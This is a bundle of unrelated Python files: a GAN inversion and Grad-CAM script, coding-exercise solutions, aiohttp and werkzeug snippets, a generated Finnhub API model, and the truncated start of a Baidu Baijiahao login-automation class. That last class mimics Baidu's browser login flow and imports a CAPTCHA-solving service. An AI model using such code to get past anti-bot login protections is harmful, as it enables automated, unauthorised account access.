Gm = Mapping(num_layers=int(math.log(args.img_size,2)-1)*2, mapping_layers=8, latent_size=512, dlatent_size=512, mapping_fmaps=512) #num_layers: 14->256 / 16->512 / 18->1024
Gm.load_state_dict(torch.load(model_path+'/Gm_dict.pth'))
Gm.buffer1 = torch.load(model_path+'/center_tensor.pt')
const_ = Gs.const
const1 = const_.repeat(args.batch_size,1,1,1).cuda()
layer_num = int(math.log(args.img_size,2)-1)*2 # 14->256 / 16 -> 512 / 18->1024
layer_idx = torch.arange(layer_num)[np.newaxis, :, np.newaxis] # shape:[1,18,1], layer_idx = [0,1,2,3,4,5,6。。。,17]
ones = torch.ones(layer_idx.shape, dtype=torch.float32) # shape:[1,18,1], ones = [1,1,1,1,1,1,1,1]
coefs = torch.where(layer_idx < layer_num//2, 0.7 * ones, ones) # truncation_psi: clip the first half of the 18 layers by 0.7 -> [0.7,0.7,...,1,1,1]
Gs.cuda()
Gm.eval()
E = BE.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3)
elif type == 2: # StyleGAN2
generator = model_v2.StyleGAN2Generator(resolution=args.img_size).to(device)
checkpoint = torch.load(model_path) #map_location='cpu'
if 'generator_smooth' in checkpoint: #default
generator.load_state_dict(checkpoint['generator_smooth'])
else:
generator.load_state_dict(checkpoint['generator'])
synthesis_kwargs = dict(trunc_psi=0.7,trunc_layers=8,randomize_noise=False)
#Gs = generator.synthesis
#Gm = generator.mapping
const_r = torch.randn(args.batch_size)
const1 = generator.synthesis.early_layer(const_r) #[n,512,4,4]
#E = BE.BE(startf=64, maxf=512, layer_count=7, latent_size=512, channels=3) # 256
E = BE.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3) # layer_count: 7->256 8->512 9->1024
elif type == 3: # PGGAN
generator = model_pggan.PGGANGenerator(resolution=args.img_size).to(device)
checkpoint = torch.load(model_path) #map_location='cpu'
if 'generator_smooth' in checkpoint: # this is the default
generator.load_state_dict(checkpoint['generator_smooth'])
else:
generator.load_state_dict(checkpoint['generator'])
const1 = torch.tensor(0)
E = BE_PG.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3, pggan=True)
elif type == 4:
config = BigGANConfig.from_json_file(args.config_dir)
generator = BigGAN(config).to(device)
generator.load_state_dict(torch.load(model_path))
E = BE_BIG.BE(startf=args.start_features, maxf=512, layer_count=int(math.log(args.img_size,2)-1), latent_size=512, channels=3, biggan=True)
else:
print('error')
return
if args.checkpoint_dir_E != None:
E.load_state_dict(torch.load(args.checkpoint_dir_E))
E.cuda()
writer = tensor_writer
batch_size = args.batch_size
#vgg16->Grad-CAM
vgg16 = torchvision.models.vgg16(pretrained=True).cuda()
final_layer = None
for name, m in vgg16.named_modules():
if isinstance(m, nn.Conv2d):
final_layer = name
grad_cam_plus_plus = GradCamPlusPlus(vgg16, final_layer)
gbp = GuidedBackPropagation(vgg16)
seed = 4 # 0, 1, 4
set_seed(seed)
z = torch.randn(batch_size, args.z_dim) #[32, 512]
if type == 1:
with torch.no_grad(): # generate the images and latent variables here
w1 = Gm(z,coefs_m=coefs).cuda() #[batch_size,18,512]
imgs1 = Gs.forward(w1,int(math.log(args.img_size,2)-2)) # 7->512 / 6->256
elif type == 2:
with torch.no_grad():
result_all = generator(z.cuda(), **synthesis_kwargs)
imgs1 = result_all['image']
w1 = result_all['wp']
elif type == 3:
with torch.no_grad(): # generate the images and latent variables here
w1 = z.cuda()
result_all = generator(w1)
imgs1 = result_all['image']
elif type == 4:
z = truncated_noise_sample(truncation=0.4, batch_size=batch_size, seed=seed)
#label = np.random.randint(1000,size=batch_size) # generate labels
flag = np.random.randint(1000)
label = np.ones(batch_size)
label = flag * label
label = one_hot(label)
w1 = torch.tensor(z, dtype=torch.float).cuda()
conditions = torch.tensor(label, dtype=torch.float).cuda() # as label
truncation = torch.tensor(0.4, dtype=torch.float).cuda()
with torch.no_grad(): # generate the images and latent variables here
imgs1, const1 = generator(w1, conditions, truncation) # const1 are conditional vectors in BigGAN
if type != 4:
const2,w2 = E(imgs1)
else:
const2,w2 = E(imgs1, const1)
if type == 1:
imgs2=Gs.forward(w2,int(math.log(args.img_size,2)-2))
elif type == 2 or type == 3:
imgs2=generator.synthesis(w2)['image']
elif type == 4:
imgs2, _ = generator(w2, conditions, truncation)
else:
print('model type error')
return
#Image Vectors
mask_1 = grad_cam_plus_plus(imgs1.detach().clone(),None) #[c,1,h,w]
mask_2 = grad_cam_plus_plus(imgs2.detach().clone(),None)
# imgs1.retain_grad()
# imgs2.retain_grad()
imgs1_ = imgs1.detach().clone()
imgs1_.requires_grad = True
imgs2_ = imgs2.detach().clone()
imgs2_.requires_grad = True
grad_1 = gbp(imgs1_) # [n,c,h,w]
grad_2 = gbp(imgs2_)
heatmap_1,cam_1 = mask2cam(mask_1.detach().clone(),imgs1.detach().clone())
heatmap_2,cam_2 = mask2cam(mask_2.detach().clone(),imgs2.detach().clone())
for i,j in enumerate(imgs1):
torchvision.utils.save_image(j.unsqueeze(0)*0.5+0.5, resultPath1_1+'/seed%d_iter%d.png'%(seed,i),nrow=1)
for i,j in enumerate(imgs2):
torchvision.utils.save_image(j.unsqueeze(0)*0.5+0.5, resultPath1_1+'/seed%d_iter%d-rc.png'%(seed,i),nrow=1)
for i,j in enumerate(heatmap_1):
torchvision.utils.save_image(j.unsqueeze(0), resultPath_grad_cam+'/seed%d_iter%d-heatmap.png'%(seed,i),nrow=1)
for i,j in enumerate(heatmap_2):
torchvision.utils.save_image(j.unsqueeze(0), resultPath_grad_cam+'/seed%d_iter%d-heatmap-rc.png'%(seed,i),nrow=1)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='the training args')
parser.add_argument('--iterations', type=int, default=210000)
parser.add_argument('--lr', type=float, default=0.0015)
parser.add_argument('--beta_1', type=float, default=0.0)
parser.add_argument('--batch_size', type=int, default=10)
parser.add_argument('--experiment_dir', default=None)
parser.add_argument('--checkpoint_dir_GAN', default='./checkpoint/stylegan_v2/stylegan2_cat256.pth')
parser.add_argument('--config_dir', default='./checkpoint/biggan/256/biggan-deep-256-config.json') # BigGAN needs it
parser.add_argument('--checkpoint_dir_E', default='./checkpoint/E/E_Cat_styleganv2_ep6.pth')#'./result/StyleGAN1-car512-Aligned-modelV2/models/E_model_iter100000.pth'
parser.add_argument('--img_size',type=int, default=256)
parser.add_argument('--img_channels', type=int, default=3)# RGB:3 ,L:1
parser.add_argument('--z_dim', type=int, default=512) # BigGAN,z=128
parser.add_argument('--mtype', type=int, default=2) # StyleGANv1=1, StyleGANv2=2, PGGAN=3, BigGAN=4
parser.add_argument('--start_features', type=int, default=64) # 16->1024 32->512 64->256
args = parser.parse_args()
if not os.path.exists('./result'): os.mkdir('./result')
resultPath = args.experiment_dir
if resultPath == None:
resultPath = "./result/infer_cat256_ep6_styleganv2"
if not os.path.exists(resultPath): os.mkdir(resultPath)
resultPath1_1 = resultPath+"/imgs"
if not os.path.exists(resultPath1_1): os.mkdir(resultPath1_1)
resultPath1_2 = resultPath+"/models"
if not os.path.exists(resultPath1_2): os.mkdir(resultPath1_2)
resultPath_grad_cam = resultPath+"/grad_cam"
if not os.path.exists(resultPath_grad_cam): os.mkdir(resultPath_grad_cam)
use_gpu = True
device = torch.device("cuda" if use_gpu else "cpu")
writer_path = os.path.join(resultPath, './summaries')
if not os.path.exists(writer_path): os.mkdir(writer_path)
writer = tensorboardX.SummaryWriter(writer_path)
train(tensor_writer=writer, args= args)
|
"""
LeetCode Problem: 22. Generate Parentheses
Link: https://leetcode.com/problems/generate-parentheses/submissions/
Language: Python
Written by: Mostofa Adib Shakib
Time complexity: Bounded by the n-th Catalan number
"""
"""
Conditions that make a string of parentheses balanced:
1) An empty string is a string in which the parentheses are balanced.
2) Adding a leading left parenthesis and a trailing right parenthesis to a balanced string yields another balanced string.
3) The concatenation of two balanced strings results in a new string in which the parentheses are also balanced.
Constraints used by the backtracking:
1) An opening parenthesis may be added only while fewer than n (the required number of pairs) have been used (Condition 1)
2) A closing parenthesis may be added only while the number of closing parentheses is less than the number of opening parentheses (Condition 2)
"""
class Solution(object):
def generateParenthesis(self, n):
"""
:type n: int
:rtype: List[str]
"""
def backtrack(array, current_string, NoleftParenthesis, NoRightParenthesis, maximumLength):
if len(current_string) == maximumLength *2: # if have found one of the solutions
array.append(current_string)
return
if NoleftParenthesis < maximumLength: # we can place an opening parenthesis
backtrack(array, current_string + '(', NoleftParenthesis+1, NoRightParenthesis, maximumLength)
if NoRightParenthesis < NoleftParenthesis: # we can place a closing parenthesis
backtrack(array, current_string + ')', NoleftParenthesis, NoRightParenthesis+1, maximumLength)
array = [] # the array containing all the solutions
backtrack(array, "", 0, 0, n) # calling the helper method
return array # returns the answer array at the end
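# A minimal usage sketch (hypothetical driver, not part of the original submission):
if __name__ == "__main__":
    solver = Solution()
    print(solver.generateParenthesis(3))
    # Expected output (order may vary): ['((()))', '(()())', '(())()', '()(())', '()()()']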
|
# This package contains all the files for those advent days starting with a zero ('01' for day 1, et cetera).
|
# -*- coding: UTF-8 -*-
__author__ = "Liu Fei"
__github__ = "http://github.com/lfblogs"
__all__ = [
"logger_factory",
"data_factory",
"response_factory",
]
"""
"""
import asyncio
import json
try:
from aiohttp import web
except ImportError:
from aio2py.required.aiohttp import web
import logging
@asyncio.coroutine
def logger_factory(app, handler):
@asyncio.coroutine
def logger(request):
logging.info('Request: %s %s' % (request.method, request.path))
return (yield from handler(request))
return logger
@asyncio.coroutine
def data_factory(app, handler):
@asyncio.coroutine
def parse_data(request):
if request.method == 'POST':
if request.content_type.startswith('application/json'):
request.__data__ = yield from request.json()
logging.info('request json: %s' % str(request.__data__))
elif request.content_type.startswith('application/x-www-form-urlencoded'):
request.__data__ = yield from request.post()
logging.info('request form: %s' % str(request.__data__))
return (yield from handler(request))
return parse_data
@asyncio.coroutine
def response_factory(app, handler):
@asyncio.coroutine
def response(request):
logging.info('Response handler...')
r = yield from handler(request)
if isinstance(r, web.StreamResponse):
return r
if isinstance(r, bytes):
resp = web.Response(body=r)
resp.content_type = 'application/octet-stream'
return resp
if isinstance(r, str):
if r.startswith('redirect:'):
return web.HTTPFound(r[9:])
resp = web.Response(body=r.encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
return resp
if isinstance(r, dict):
template = r.get('__template__')
if template is None:
resp = web.Response(body=json.dumps(r, ensure_ascii=False, default=lambda o: o.__dict__).encode('utf-8'))
resp.content_type = 'application/json;charset=utf-8'
return resp
else:
resp = False
try:
r['__user__'] = request.__user__
except:
r['__user__'] = ''
if isinstance(app['__templating__'], list):
for index,i in enumerate(app['__templating__']):
try:
app['__templating__'][index].get_template(template)
except:
pass
else:
resp = web.Response(body=app['__templating__'][index].get_template(template).render(**r).encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
break
else:
resp = web.Response(body=app['__templating__'].get_template(template).render(**r).encode('utf-8'))
resp.content_type = 'text/html;charset=utf-8'
if resp:
return resp
else:
raise FileNotFoundError('template file {} is not found'.format(template))
if isinstance(r, int) and r >= 100 and r < 600:
return web.Response(r)
if isinstance(r, tuple) and len(r) == 2:
t, m = r
if isinstance(t, int) and t >= 100 and t < 600:
return web.Response(t, str(m))
# default:
resp = web.Response(body=str(r).encode('utf-8'))
resp.content_type = 'text/plain;charset=utf-8'
return resp
return response
|
# -*- coding: utf-8 -*-
from werkzeug.wrappers import Response, Request
@Request.application
def application(request):
return Response('Hello world')
if __name__ == '__main__':
from werkzeug.serving import run_simple
run_simple('0.0.0.0', 4000, application)
|
# coding: utf-8
"""
Finnhub API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from finnhub.configuration import Configuration
class MergerCountry(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'announcement_date': 'datetime',
'deal_size': 'float',
'status': 'str',
'target_name': 'str',
'target_nation': 'str',
'acquirer_name': 'str',
'acquirer_nation': 'str',
'form': 'str',
'target_industry': 'str',
'acquirer_industry': 'str',
'target_description': 'str',
'acquirer_description': 'str',
'target_region': 'str',
'acquirer_region': 'str',
'target_public_status': 'str',
'acquirer_public_status': 'str',
'deal_attitude': 'str',
'netincome_multiple': 'float',
'percent_acquired': 'float'
}
attribute_map = {
'announcement_date': 'announcementDate',
'deal_size': 'dealSize',
'status': 'status',
'target_name': 'targetName',
'target_nation': 'targetNation',
'acquirer_name': 'acquirerName',
'acquirer_nation': 'acquirerNation',
'form': 'form',
'target_industry': 'targetIndustry',
'acquirer_industry': 'acquirerIndustry',
'target_description': 'targetDescription',
'acquirer_description': 'acquirerDescription',
'target_region': 'targetRegion',
'acquirer_region': 'acquirerRegion',
'target_public_status': 'targetPublicStatus',
'acquirer_public_status': 'acquirerPublicStatus',
'deal_attitude': 'dealAttitude',
'netincome_multiple': 'netincomeMultiple',
'percent_acquired': 'percentAcquired'
}
def __init__(self, announcement_date=None, deal_size=None, status=None, target_name=None, target_nation=None, acquirer_name=None, acquirer_nation=None, form=None, target_industry=None, acquirer_industry=None, target_description=None, acquirer_description=None, target_region=None, acquirer_region=None, target_public_status=None, acquirer_public_status=None, deal_attitude=None, netincome_multiple=None, percent_acquired=None, local_vars_configuration=None): # noqa: E501
"""MergerCountry - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._announcement_date = None
self._deal_size = None
self._status = None
self._target_name = None
self._target_nation = None
self._acquirer_name = None
self._acquirer_nation = None
self._form = None
self._target_industry = None
self._acquirer_industry = None
self._target_description = None
self._acquirer_description = None
self._target_region = None
self._acquirer_region = None
self._target_public_status = None
self._acquirer_public_status = None
self._deal_attitude = None
self._netincome_multiple = None
self._percent_acquired = None
self.discriminator = None
if announcement_date is not None:
self.announcement_date = announcement_date
if deal_size is not None:
self.deal_size = deal_size
if status is not None:
self.status = status
if target_name is not None:
self.target_name = target_name
if target_nation is not None:
self.target_nation = target_nation
if acquirer_name is not None:
self.acquirer_name = acquirer_name
if acquirer_nation is not None:
self.acquirer_nation = acquirer_nation
if form is not None:
self.form = form
if target_industry is not None:
self.target_industry = target_industry
if acquirer_industry is not None:
self.acquirer_industry = acquirer_industry
if target_description is not None:
self.target_description = target_description
if acquirer_description is not None:
self.acquirer_description = acquirer_description
if target_region is not None:
self.target_region = target_region
if acquirer_region is not None:
self.acquirer_region = acquirer_region
if target_public_status is not None:
self.target_public_status = target_public_status
if acquirer_public_status is not None:
self.acquirer_public_status = acquirer_public_status
if deal_attitude is not None:
self.deal_attitude = deal_attitude
if netincome_multiple is not None:
self.netincome_multiple = netincome_multiple
if percent_acquired is not None:
self.percent_acquired = percent_acquired
@property
def announcement_date(self):
"""Gets the announcement_date of this MergerCountry. # noqa: E501
Announcement date of the deal. # noqa: E501
:return: The announcement_date of this MergerCountry. # noqa: E501
:rtype: datetime
"""
return self._announcement_date
@announcement_date.setter
def announcement_date(self, announcement_date):
"""Sets the announcement_date of this MergerCountry.
Announcement date of the deal. # noqa: E501
:param announcement_date: The announcement_date of this MergerCountry. # noqa: E501
:type: datetime
"""
self._announcement_date = announcement_date
@property
def deal_size(self):
"""Gets the deal_size of this MergerCountry. # noqa: E501
Deal size in millions of USD. # noqa: E501
:return: The deal_size of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._deal_size
@deal_size.setter
def deal_size(self, deal_size):
"""Sets the deal_size of this MergerCountry.
Deal size in millions of USD. # noqa: E501
:param deal_size: The deal_size of this MergerCountry. # noqa: E501
:type: float
"""
self._deal_size = deal_size
@property
def status(self):
"""Gets the status of this MergerCountry. # noqa: E501
Deal status. # noqa: E501
:return: The status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""Sets the status of this MergerCountry.
Deal status. # noqa: E501
:param status: The status of this MergerCountry. # noqa: E501
:type: str
"""
self._status = status
@property
def target_name(self):
"""Gets the target_name of this MergerCountry. # noqa: E501
Target company name. # noqa: E501
:return: The target_name of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_name
@target_name.setter
def target_name(self, target_name):
"""Sets the target_name of this MergerCountry.
Target company name. # noqa: E501
:param target_name: The target_name of this MergerCountry. # noqa: E501
:type: str
"""
self._target_name = target_name
@property
def target_nation(self):
"""Gets the target_nation of this MergerCountry. # noqa: E501
Target company country. # noqa: E501
:return: The target_nation of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_nation
@target_nation.setter
def target_nation(self, target_nation):
"""Sets the target_nation of this MergerCountry.
Target company country. # noqa: E501
:param target_nation: The target_nation of this MergerCountry. # noqa: E501
:type: str
"""
self._target_nation = target_nation
@property
def acquirer_name(self):
"""Gets the acquirer_name of this MergerCountry. # noqa: E501
Acquirer name. # noqa: E501
:return: The acquirer_name of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_name
@acquirer_name.setter
def acquirer_name(self, acquirer_name):
"""Sets the acquirer_name of this MergerCountry.
Acquirer name. # noqa: E501
:param acquirer_name: The acquirer_name of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_name = acquirer_name
@property
def acquirer_nation(self):
"""Gets the acquirer_nation of this MergerCountry. # noqa: E501
Acquirer nation. # noqa: E501
:return: The acquirer_nation of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_nation
@acquirer_nation.setter
def acquirer_nation(self, acquirer_nation):
"""Sets the acquirer_nation of this MergerCountry.
Acquirer nation. # noqa: E501
:param acquirer_nation: The acquirer_nation of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_nation = acquirer_nation
@property
def form(self):
"""Gets the form of this MergerCountry. # noqa: E501
Deal form. # noqa: E501
:return: The form of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._form
@form.setter
def form(self, form):
"""Sets the form of this MergerCountry.
Deal form. # noqa: E501
:param form: The form of this MergerCountry. # noqa: E501
:type: str
"""
self._form = form
@property
def target_industry(self):
"""Gets the target_industry of this MergerCountry. # noqa: E501
Target company industry. # noqa: E501
:return: The target_industry of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_industry
@target_industry.setter
def target_industry(self, target_industry):
"""Sets the target_industry of this MergerCountry.
Target company industry. # noqa: E501
:param target_industry: The target_industry of this MergerCountry. # noqa: E501
:type: str
"""
self._target_industry = target_industry
@property
def acquirer_industry(self):
"""Gets the acquirer_industry of this MergerCountry. # noqa: E501
Deal form. # noqa: E501
:return: The acquirer_industry of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_industry
@acquirer_industry.setter
def acquirer_industry(self, acquirer_industry):
"""Sets the acquirer_industry of this MergerCountry.
Deal form. # noqa: E501
:param acquirer_industry: The acquirer_industry of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_industry = acquirer_industry
@property
def target_description(self):
"""Gets the target_description of this MergerCountry. # noqa: E501
Target company business summary. # noqa: E501
:return: The target_description of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_description
@target_description.setter
def target_description(self, target_description):
"""Sets the target_description of this MergerCountry.
Target company business summary. # noqa: E501
:param target_description: The target_description of this MergerCountry. # noqa: E501
:type: str
"""
self._target_description = target_description
@property
def acquirer_description(self):
"""Gets the acquirer_description of this MergerCountry. # noqa: E501
Acquirer business summary. # noqa: E501
:return: The acquirer_description of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_description
@acquirer_description.setter
def acquirer_description(self, acquirer_description):
"""Sets the acquirer_description of this MergerCountry.
Acquirer business summary. # noqa: E501
:param acquirer_description: The acquirer_description of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_description = acquirer_description
@property
def target_region(self):
"""Gets the target_region of this MergerCountry. # noqa: E501
Target company region. # noqa: E501
:return: The target_region of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_region
@target_region.setter
def target_region(self, target_region):
"""Sets the target_region of this MergerCountry.
Target company region. # noqa: E501
:param target_region: The target_region of this MergerCountry. # noqa: E501
:type: str
"""
self._target_region = target_region
@property
def acquirer_region(self):
"""Gets the acquirer_region of this MergerCountry. # noqa: E501
Acquirer company region. # noqa: E501
:return: The acquirer_region of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_region
@acquirer_region.setter
def acquirer_region(self, acquirer_region):
"""Sets the acquirer_region of this MergerCountry.
Acquirer company region. # noqa: E501
:param acquirer_region: The acquirer_region of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_region = acquirer_region
@property
def target_public_status(self):
"""Gets the target_public_status of this MergerCountry. # noqa: E501
Target company public status. # noqa: E501
:return: The target_public_status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._target_public_status
@target_public_status.setter
def target_public_status(self, target_public_status):
"""Sets the target_public_status of this MergerCountry.
Target company public status. # noqa: E501
:param target_public_status: The target_public_status of this MergerCountry. # noqa: E501
:type: str
"""
self._target_public_status = target_public_status
@property
def acquirer_public_status(self):
"""Gets the acquirer_public_status of this MergerCountry. # noqa: E501
Acquirer company public status. # noqa: E501
:return: The acquirer_public_status of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._acquirer_public_status
@acquirer_public_status.setter
def acquirer_public_status(self, acquirer_public_status):
"""Sets the acquirer_public_status of this MergerCountry.
Acquirer company public status. # noqa: E501
:param acquirer_public_status: The acquirer_public_status of this MergerCountry. # noqa: E501
:type: str
"""
self._acquirer_public_status = acquirer_public_status
@property
def deal_attitude(self):
"""Gets the deal_attitude of this MergerCountry. # noqa: E501
Deal attitude. # noqa: E501
:return: The deal_attitude of this MergerCountry. # noqa: E501
:rtype: str
"""
return self._deal_attitude
@deal_attitude.setter
def deal_attitude(self, deal_attitude):
"""Sets the deal_attitude of this MergerCountry.
Deal attitude. # noqa: E501
:param deal_attitude: The deal_attitude of this MergerCountry. # noqa: E501
:type: str
"""
self._deal_attitude = deal_attitude
@property
def netincome_multiple(self):
"""Gets the netincome_multiple of this MergerCountry. # noqa: E501
Net Income Multiple. # noqa: E501
:return: The netincome_multiple of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._netincome_multiple
@netincome_multiple.setter
def netincome_multiple(self, netincome_multiple):
"""Sets the netincome_multiple of this MergerCountry.
Net Income Multiple. # noqa: E501
:param netincome_multiple: The netincome_multiple of this MergerCountry. # noqa: E501
:type: float
"""
self._netincome_multiple = netincome_multiple
@property
def percent_acquired(self):
"""Gets the percent_acquired of this MergerCountry. # noqa: E501
Percent acquired. # noqa: E501
:return: The percent_acquired of this MergerCountry. # noqa: E501
:rtype: float
"""
return self._percent_acquired
@percent_acquired.setter
def percent_acquired(self, percent_acquired):
"""Sets the percent_acquired of this MergerCountry.
Percent acquired. # noqa: E501
:param percent_acquired: The percent_acquired of this MergerCountry. # noqa: E501
:type: float
"""
self._percent_acquired = percent_acquired
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, MergerCountry):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, MergerCountry):
return True
return self.to_dict() != other.to_dict()
|
# Take 2 input sets A and B
input()
A = set(map(int, input().split()))
input()
B = set(map(int, input().split()))
# Print the size of the symmetric difference of A and B
print(len(A.symmetric_difference(B)))
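# Worked example with hypothetical sets (not taken from the exercise's stdin):
# A = {2, 4, 5, 9} and B = {2, 4, 11, 12} -> A.symmetric_difference(B) == {5, 9, 11, 12},
# so the script would print 4.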
|
import re
import time
import datetime
import requests
import execjs
import json
import rsa
import base64
import os
from lib.mp.base import Base
from lib.yundama import verify_captcha
from lib.tools.custom_exception import CustomException
from lib.tools import toutiao_login_js
class BaiJia(Base):
mp_id = 3
zh_name = '百家号'
feed_cat = {'创意': '18', '美食': '22', '科学': '32', '女人': '21', '美图': '20', '辟谣': '38', '三农': '35', '游戏': '13',
'两性': '25', '房产': '9',
'娱乐': '4', '宠物': '31', '科技': '8', '汽车': '10', '军事': '14', '情感': '26', '生活': '16', '家居': '23',
'教育': '11', '悦读': '37',
'时尚': '12', '历史': '30', '职场': '34', '体育': '3', '国际': '1', '搞笑': '19', '健康': '24', '动漫': '33',
'育儿': '28',
'文化': '29', '财经': '6', '互联网': '7', '旅游': '15', '社会': '5'}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36'}
@staticmethod
def login(user, pswd, **kw):
BaiJia.logger.info(user)
session = requests.session()
session.headers.update(BaiJia.headers)
session.get('https://pan.baidu.com')
gid = BaiJia._get_runntime().call('getGid')
callback = BaiJia._get_runntime().call('getCallback')
traceid = BaiJia._get_runntime().call('createHeadID')
token = BaiJia.get_token(gid, callback, session)
pubkey, key = BaiJia.get_rsa_key(token, gid, callback, session, traceid)
pub = rsa.PublicKey.load_pkcs1_openssl_pem(pubkey.encode('utf-8'))
encript_passwd = rsa.encrypt(pswd.encode('utf-8'), pub)
password = base64.b64encode(encript_passwd).decode('utf-8')
post_data = {
"staticpage": "https://pan.baidu.com/res/static/thirdparty/pass_v3_jump.html",
"charset": "UTF-8",
"token": token,
"tpl": "netdisk",
"subpro": "netdisk_web",
"apiver": "v3",
"tt": int(time.time() * 1000),
"codestring": "",
"safeflg": "0",
"u": "https://pan.baidu.com/disk/home",
"isPhone": "",
"detect": "1",
"gid": gid,
"quick_user": "0",
"logintype": "basicLogin",
"logLoginType": "pc_loginBasic",
"idc": "",
"loginmerge": "true",
"foreignusername": "",
"username": user,
"password": password,
"mem_pass": "on",
"rsakey": key,
"crypttype": "12",
"ppui_logintime": "87162",
"countrycode": "",
"fp_uid": "",
"fp_info": "",
"loginversion": "v4",
# "ds": "Hod9Kug32hLv7vGhxTCcWJVf/QXQYFHc8PZPH0+zODP158rYpLIoKIpgsiwjnpDmOW9UaBLEXW4X5efR6Sz7Uaq4zPr3sW4PzQYlNaMthOQ8jzhIFE73wsuCDuKkDB7Yy0zcxKXYbdPwb2QtOdt6p3vo7CID9dUWOeZezxJhdunwl7NmOFnoLWS/3I3EYOEcYt5ijPSv/ec154vXGAjR7+1gxkTP7VTxHDHHNccMRWR6y+lfhIQPEztmgZta6nuYtHZNqkYw6+wzkVX17Wm8pkLKQ1gLXBLK4gUgX4cReWEXWMR+6brnSuExcCsbiiQNiXYfjcuP3Eb81ELieJu0649Wt3sDofhLv2/efpuX+OmNnArLWYHL5S6O45L5nAwhUIayWwd797vrQtP/dufnYNezxx6tfEqA3Fmz/YiAJPRBzyiVd7GHkbIfeTmu/6dldEV+22xqtqlZFZMacR7OvhsurN0WVixqyr1jxrI9sPShMprA2z0QThgt1gySZe1BENPUom/e7FkvpacpMB0nWPCoe4G/HY6mTXw1zOkoHUfOurV6u1hPOBFJgzWkMbqWHO+bzazSQZ0XWEauKOr/jooE1JTplQlEXQEO/dx37dlsoHQO8h0Pp9CNs86noYbaQnoTS+7iFIfKMpYyz8IJ14ptmGnOx+NVEXBIfy5eN75eW2l82JUd6xhGyZ0RSIgYoIBv3/sHRhVmvlDgex6AxbRbq7muho8lk7Auj5IVnldC8nYFhogldtRuaLY34wJv25PHQNNmnVc/rbZNcrDmKtTHVvZ3LHDjIfE6TNTAiq+nOf4WaG44P8vBeWQYOV/6Jf3c1D+5cY/1f3Ubg23JWCJCSKAe9RsuXDybUeRmmNW9tEIjeKz2xVyvL9EfgX/VO/AspyTDdTr6hOp4zZ1Jruo9fEXjoW3hP5oh58FkqfAJoZiAsoGs31PeUPvXSaOpOm6ERI67VeVhXi3W9XB01xSvFiVtZk1LZh/Z2MnU7268sPARwZ9fP15CI3kYlIStnnYoSOoOjLbdMqztJKioaQGDhI4UNLMxkuueeieEoBiIpeDV2678VkvoG+ZhDEkmCFboX7yS01uILrfBc9fh9XbaF1sTOLsT2acMt34nFgoujbBkq6UW/K1tGqQNpWQHss/xb65WjgU5Cstpw1TgSsw/qetKeGlNkQt+mya+PPdr2q+lCbN9HufaeBor4cDKXXHVcFwbkibIZcrYwAW8yZ0xCZREZplCTDmBuscgf8rU3FmThstzx1vc80yGYqs+qVdzWjy9uDMuEwHPHvK6HlLhnySOgb/5TSNljcYARXk=",
# "tk": "2006TG/w+3FOc0s137wM1+PWMcG/pf+Rcr2Z9GcdGBPugJU=",
